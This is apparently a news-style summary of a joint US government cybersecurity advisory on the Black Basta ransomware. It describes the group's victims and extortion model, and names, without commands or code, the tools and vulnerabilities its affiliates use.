Black Basta is a ransomware variant whose actors targeted over 500 private industry organizations and encrypted and stolen data from at least 12 out of 16 critical infrastructure sectors.

Because of that, the Cybersecurity and Infrastructure Security Agency (CISA) in partnership with the Federal Bureau of Investigation (FBI), the Department of Health and Human Services (HHS), and the Multi-State Information Sharing and Analysis Center (MS-ISAC) released a joint Cybersecurity Advisory (CSA), entitled: #StopRansomware: Black Basta.

This joint CSA provides TTPs and IoCs obtained from FBI investigations and third-party reporting. Black Basta is a ransomware-as-a-service (RaaS) variant and was first identified in April 2022.

Black Basta affiliates have impacted a wide range of businesses and critical infrastructure in North America, Europe, and Australia.

Black Basta affiliates use common initial access techniques – such as phishing and exploiting known vulnerabilities – and then employ a double-extortion model, both encrypting systems and exfiltrating data. Ransom notes do not generally include an initial ransom demand or payment instructions. Instead, the notes provide victims with a unique code and instructs them to contact the ransomware group via a .onion URL (reachable through the Tor browser). Typically, the ransom notes give victims between 10 and 12 days to pay the ransom before the ransomware group publishes their data on the Black Basta TOR site, Basta News.

Schneider Bold

Black Basta affiliates primarily use spear phishing to obtain initial access. According to cybersecurity researchers, affiliates have also used Qakbot during initial access.

Starting in February 2024, Black Basta affiliates began exploiting ConnectWise vulnerability. In some instances, affiliates have been observed abusing valid credentials.

Black Basta affiliates use tools such as SoftPerfect network scanner (netscan.exe) to conduct network scanning. Cybersecurity researchers have observed affiliates conducting reconnaissance using utilities with innocuous file names such as Intel or Dell, left in the root drive C:\.

Black Basta affiliates use tools such as BITSAdmin and PsExec, along with Remote Desktop Protocol (RDP), for lateral movement. Some affiliates also use tools like Splashtop, Screen Connect, and Cobalt Strike beacons to assist with remote access and lateral movement.

Black Basta affiliates use credential scraping tools like Mimikatz for privilege escalation. According to cybersecurity researchers, Black Basta affiliates have also exploited ZeroLogon, NoPac and PrintNightmare vulnerabilities for local and Windows Active Domain privilege escalation.

Black Basta affiliates use RClone to facilitate data exfiltration prior to encryption. Prior to exfiltration, cybersecurity researchers observed Black Basta affiliates using PowerShell to disable antivirus products, and in some instances, deploying a tool called Backstab, designed to disable endpoint detection and response (EDR) tooling. Once antivirus programs are terminated, a ChaCha20 algorithm with an RSA-4096 public key fully encrypts files. A .basta or otherwise random file extension adds to file names and a ransom note titled readme.txt is left on the compromised system. To further inhibit system recovery, affiliates use the vssadmin.exe program to delete volume shadow copies.

Click here to read more of the Black Basta CSA.


Pin It on Pinterest

Share This